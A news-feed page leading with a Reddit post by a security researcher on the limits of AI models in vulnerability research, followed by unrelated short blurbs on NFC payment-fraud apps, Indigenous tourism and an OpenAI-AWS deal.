For those of you who are afraid that AI will take over security research

For those of you who are afraid that AI will take over security research

https://preview.redd.it/jaqmpygbu1zf1.png?width=1624&format=png&auto=webp&s=532abe8eb9e3ce54c7b113197b0d9e951540be4c

I’ve been using it as an assistant for a few months. For coding it’s good for generating basic slop code which I can convert into something meaningful. And a few weeks ago I decided to give it a try in security research. There are use cases where it can help me. Like to make sure I understand a piece of code right. Or if I can’t find a missing piece I feed it a few files and ask to find what I’m looking for. And then I do a deeper dive into the place it points me to. Overall I feel it compliments me well. I have ADHD, can overlook boring areas. I operate on a higher level of abstraction. Tend to be inclined to architectural bugs and get bored with digging into lower level stuff. Where this thing does a better job. But what I can say is that I don’t see it being able to conduct code analysis on it’s own. And find quality vulnerabilities. What it does is extremely superficial. And most of the times false positive. Additionally it’s absolutely not able to spot cross component bugs unless you explicitly start asking scenario specific questions. Not sure how this newly released GPT 5 scanner will behave. I have low expectations tbh. A lot because of the context window. Most of the bugs that I’ve found needed me to keep a context/state in my head. Which AI is not doing. So idk. Maybe high level, single block limited bugs. Contaminated with meaningless garbage which will take time to filter through. At least for now. But also they say it’ll be patching those “bugs” right away. I wouldn’t let it to do it autonomously.

I can definitely see how young overly excited minds can utilize this tool to flood programs with highly technical BS reports.

On the screenshot a piece of my conversation with it yesterday. It was describing me a potential exploit for a “critical” bug that it found in one of the pieces we were looking at. The bug btw also didn’t exists. Also not just exploit was a BS but even if the BF time wouldn’t take multiple lifetimes it still would be irrelevant. Again because it was not holding the whole context. The model is Gemini Pro 2.5. I think it has 1m tokens context window while GPT 5 has 400k.

submitted by /u/unknow_feature
[link] [comments]

Read More >>

Android Apps misusing NFC and HCE to steal payment data on the rise

Zimperium zLabs found 760+ Android apps abusing NFC and HCE to steal payment data, showing a surge in NFC relay fraud since April 2024. Zimperium zLabs researchers spotted over 760 Android apps abusing Near-Field Communication (NFC) and Host Card Emulation (HCE) to steal payment data and commit fraud, showing rapid growth in NFC relay attacks […]

Read More >>

Authenticity attracts travelers to Indigenous tourism

Pouring a cup of tea from her thermos, Indigenous guide Talaysay Campo explains the local ingredients and significance of the tea to her guests while they sit amongst the towering Douglas fir trees in Stanley Park. Although the park is one of the top t…

Read More >>

As part of the AWS deal, OpenAI says it will immediately begin running workloads on AWS infrastructure, tapping hundreds of thousands of Nvidia GPUs in the US (MacKenzie Sigalos/CNBC)

MacKenzie Sigalos / CNBC:
As part of the AWS deal, OpenAI says it will immediately begin running workloads on AWS infrastructure, tapping hundreds of thousands of Nvidia GPUs in the US  —  OpenAI has signed a deal to buy $38 billion w…

Read More >>